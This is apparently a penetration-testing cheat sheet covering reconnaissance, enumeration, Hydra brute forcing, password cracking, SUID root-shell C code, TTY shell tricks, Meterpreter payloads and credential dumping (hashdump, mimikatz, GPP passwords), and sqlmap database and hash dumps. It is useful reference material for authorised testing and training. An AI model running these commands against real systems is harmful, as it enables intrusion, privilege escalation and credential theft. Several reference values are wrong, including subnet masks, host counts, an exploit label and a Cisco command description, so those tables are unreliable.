Penetration testing tools cheat sheet, a quick reference high level overview for typical engagements. Designed as a quick reference cheat sheet providing a high level overview of the typicalcommands you would run when performing a penetration test. For more in depth information I’d recommend the man file for the tool or a more specific .

Recon and Enumeration

NMAP Commands

For more commands, see .

COMMAND DESCRIPTION

nmap -v -sS -A -T4 target

Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services

nmap -v -sS -p--A -T4 target

As above but scans all TCP ports (takes a lot longer)

nmap -v -sU -sS -p- -A -T4 target

As above but scans all TCP ports and UDP scan (takes even longer)

nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X

Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

ls /usr/share/nmap/scripts/* | grep ftp

Search nmap scripts for keywords

SMB enumeration

Also see, .

COMMAND DESCRIPTION

nbtscan 192.168.1.0/24

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

enum4linux -a target-ip

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don’t use nmap…

COMMAND DESCRIPTION

netdiscover -r 192.168.1.0/24

Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

COMMAND DESCRIPTION

nbtscan 192.168.1.0/24

 Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

enum4linux -a target-ip

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

COMMAND DESCRIPTION

python -m SimpleHTTPServer 80

Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION

mount 192.168.1.1:/vol/share /mnt/nfs

Mount NFS share to /mnt/nfs

mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs

Mount Windows CIFS / SMB share on Linux at /mnt/cifsif you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)

net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no

Mount a Windows share on Windows from the command line

apt-get install smb4k -y

Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

Manual finger printing / banner grabbing.

COMMAND DESCRIPTION

nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Basic versioning / finger printing via displayed banner

SNMP Enumeration

COMMAND DESCRIPTION

snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

 SNMP enumeration

DNS Zone Transfers

COMMAND DESCRIPTION

nslookup -> set type=any -> ls -d blah.com

Windows DNS zone transfer

dig axfr blah.com @ns1.blah.com

Linux DNS zone transfer

DNSRecon

DNS Enumeration Kali - DNSRecon

root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

COMMAND DESCRIPTION

nikto -h 192.168.1.1

Perform a nikto scan against target

dirbuster

Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

COMMAND DESCRIPTION

tcpdump tcp port 80 -w output.pcap -i eth0

tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

COMMAND DESCRIPTION

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

Enumerate users from SMB

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

COMMAND DESCRIPTION

snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4

Enmerate users from SNMP

python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX

Enmerate users from SNMP

nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)

Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

COMMAND DESCRIPTION

/usr/share/wordlists

Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

COMMAND DESCRIPTION

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V

Hydra FTP brute force

Hydra POP3 Brute Force

COMMAND DESCRIPTION

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V

Hydra POP3 brute force

Hydra SMTP Brute Force

COMMAND DESCRIPTION

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V

Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper - JTR

COMMAND DESCRIPTION

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

JTR password cracking

john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt cracking with wordlist

john --format=descrypt hash --show

JTR forced descrypt brute force cracking

Exploit Research

Ways to find exploits for enumerated hosts / services.

COMMAND DESCRIPTION

searchsploit windows 2003 | grep -i local

Search exploit-db for exploit, in this example windows 2003 + local esc

site:exploit-db.com exploit kernel <= 3

Use google to search exploit-db.com for exploits

grep -R "W7" /usr/share/metasploit-framework
/modules/exploit/windows/*

Search metasploit modules using grep - msf search sucks a bit

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See  for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION

process.h, string.h, winbase.h, windows.h, winsock2.h

Windows exploit code

arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h

Linux exploit code

Build Exploit GCC

Compile exploit gcc.

COMMAND DESCRIPTION

gcc -o exploit exploit.c

Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION

gcc -m32 exploit.c -o exploit

Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
           setresuid(0, 0, 0);       system("/bin/bash");}

SUID C Shell for /bin/sh

int main(void){
           setresuid(0, 0, 0);       system("/bin/sh");}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

Reverse Shells

See  for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see - techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

COMMAND DESCRIPTION

set payload windows/meterpreter/reverse_tcp

Windows reverse tcp payload

Windows VNC Meterpreter payload

COMMAND DESCRIPTION

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

COMMAND DESCRIPTION

set payload linux/meterpreter/reverse_tcp

Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

COMMAND DESCRIPTION

upload file c:\\windows

Meterpreter upload file to Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

execute -f c:\\windows\temp\exploit.exe

Meterpreter run .exe on target - handy for executing uploaded exploits

execute -f cmd -c

Creates new channel with cmd shell

ps

Meterpreter show processes

shell

Meterpreter get shell on the target

getsystem

Meterpreter attempts priviledge escalation the target

hashdump

Meterpreter attempts to dump the hashes on the target

portfwd add –l 3389 –p 3389 –r target

Meterpreter create port forward to target machine

portfwd delete –l 3389 –p 3389 –r target

Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION

use exploit/windows/smb/ms08_067_netapi

MS08_067 Windows 2k, XP, 2003 Remote Exploit

use exploit/windows/dcerpc/ms06_040_netapi

MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit

use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index

MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION

use exploit/windows/local/bypassuac

Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

COMMAND DESCRIPTION

use auxiliary/scanner/http/dir_scanner

Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan

Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login

Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version

Metasploit MSSQL Version Scanner

use auxiliary/scanner/oracle/oracle_login

Metasploit Oracle Login Module

Metasploit Powershell Modules

COMMAND DESCRIPTION

use exploit/multi/script/web_delivery

Metasploit powershell payload delivery module

post/windows/manage/powershell/exec_powershell

Metasploit upload and run powershell script through a session

use exploit/multi/http/jboss_maindeployer

Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload

Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

COMMAND DESCRIPTION

run post/windows/gather/win_privs

Metasploit show privileges of current user

use post/windows/gather/credentials/gpp

Metasploit grab GPP saved passwords

load mimikatz -> wdigest

Metasplit load Mimikatz

run post/windows/gather/local_admin_search_enum

Idenitfy other machines that the supplied domain user has administrative access to

Networking

TTL Fingerprinting

OPERATING SYSTEM TTL SIZE

Windows

128

Linux

64

Solaris

255

Cisco / Network

255

IPv4

Classful IP Ranges

E.g Class A,B,C (depreciated)

CLASS IP ADDRESS RANGE

Class A IP Address Range

0.0.0.0 - 127.255.255.255

Class B IP Address Range

128.0.0.0 - 191.255.255.255

Class C IP Address Range

192.0.0.0 - 223.255.255.255

Class D IP Address Range

224.0.0.0 - 239.255.255.255

Class E IP Address Range

240.0.0.0 - 255.255.255.255

IPv4 Private Address Ranges

CLASS RANGE

Class A Private Address Range

10.0.0.0 - 10.255.255.255

Class B Private Address Range

172.16.0.0 - 172.31.255.255

Class C Private Address Range

192.168.0.0 - 192.168.255.255

127.0.0.0 - 127.255.255.255

IPv4 Subnet Cheat Sheet

CIDR DECIMAL MASK NUMBER OF HOSTS

/31

255.255.255.254

1 Host

/30

255.255.255.252

2 Hosts

/29

255.255.255.249

6 Hosts

/28

255.255.255.240

14 Hosts

/27

255.255.255.224

30 Hosts

/26

255.255.255.192

62 Hosts

/25

255.255.255.128

126 Hosts

/24

255.255.255.0

254 Hosts

/23

255.255.254.0

512 Host

/22

255.255.252.0

1022 Hosts

/21

255.255.248.0

2046 Hosts

/20

255.255.240.0

4094 Hosts

/19

255.255.224.0

8190 Hosts

/18

255.255.192.0

16382 Hosts

/17

255.255.128.0

32766 Hosts

/16

255.255.0.0

65534 Hosts

/15

255.254.0.0

131070 Hosts

/14

255.252.0.0

262142 Hosts

/13

255.248.0.0

524286 Hosts

/12

255.240.0.0

1048674 Hosts

/11

255.224.0.0

2097150 Hosts

/10

255.192.0.0

4194302 Hosts

/9

255.128.0.0

8388606 Hosts

/8

255.0.0.0

16777214 Hosts

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER

x00

Null Byte

x08

BS

x09

TAB

x0a

LF

x0d

CR

x1b

ESC

x20

SPC

x21

!

x22

"

x23

#

x24

$

x25

%

x26

&

x27

`

x28

(

x29

)

x2a

*

x2b

+

x2c

,

x2d

-

x2e

.

x2f

/

x30

0

x31

1

x32

2

x33

3

x34

4

x35

5

x36

6

x37

7

x38

8

x39

9

x3a

:

x3b

;

x3c

<

x3d

=

x3e

>

x3f

?

x40

@

x41

A

x42

B

x43

C

x44

D

x45

E

x46

F

x47

G

x48

H

x49

I

x4a

J

x4b

K

x4c

L

x4d

M

x4e

N

x4f

O

x50

P

x51

Q

x52

R

x53

S

x54

T

x55

U

x56

V

x57

W

x58

X

x59

Y

x5a

Z

x5b

[

x5c

\

x5d

]

x5e

^

x5f

_

x60

`

x61

a

x62

b

x63

c

x64

d

x65

e

x66

f

x67

g

x68

h

x69

i

x6a

j

x6b

k

x6c

l

x6d

m

x6e

n

x6f

o

x70

p

x71

q

x72

r

x73

s

x74

t

x75

u

x76

v

x77

w

x78

x

x79

y

x7a

z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION

enable

Enters enable mode

conf t

Short for, configure terminal

(config)# interface fa0/0

Configure FastEthernet 0/0

(config-if)# ip addr 0.0.0.0 255.255.255.255

Add ip to fa0/0

(config-if)# ip addr 0.0.0.0 255.255.255.255

Add ip to fa0/0

(config-if)# line vty 0 4

Configure vty line

(config-line)# login

Cisco set telnet password

(config-line)# password YOUR-PASSWORD

Set telnet password

# show running-config

Show running config loaded in memory

# show startup-config

Show sartup config

# show version

show cisco IOS version

# show session

display open sessions

# show ip interface

Show network interfaces

# show interface e0

Show detailed interface info

# show ip route

Show routes

# show access-lists

Show access lists

# dir file systems

Show available files

# dir all-filesystems

File information

# dir /all

SHow deleted files

# terminal length 0

No limit on terminal output

# copy running-config tftp

Copys running config to tftp server

# copy running-config startup-config

Copy startup-config to running-config

Cryptography

Hash Lengths

HASH SIZE

MD5 Hash Length

16 Bytes

SHA-1 Hash Length

20 Bytes

SHA-256 Hash Length

32 Bytes

SHA-512 Hash Length

64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

HASH EXAMPLE

MD5 Hash Example

8743b52063cd84097a65d1633f5c74f5

MD5 $PASS:$SALT Example

01dfae6e5d4d90d9892622325959afbe:7050461

MD5 $SALT:$PASS

f0fda58630310a6dd91a7d8f0a4ceda2:4225637426

SHA1 Hash Example

b89eaac7e61417341b710b727768294d0e6a277b

SHA1 $PASS:$SALT

2fc5a684737ce1bf7b3b239df432416e0dd07357:2014

SHA1 $SALT:$PASS

cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024

SHA-256

127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935

SHA-256 $PASS:$SALT

c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4

SHA-256 $SALT:$PASS

eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617

SHA-512

82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f

SHA-512 $PASS:$SALT

e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd

SHA-512 $SALT:$PASS

976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a

NTLM Hash Example

b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples

COMMAND DESCRIPTION

sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3

Automated sqlmap scan

sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"

Targeted sqlmap scan

sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump

Scan url for union + error based injection with mysql backend 
and use a random user agent + database dump

sqlmap -o -u "http://meh.com/form/" --forms

sqlmap check form for injection

sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump

sqlmap dump and crack hashes for table users on database-name.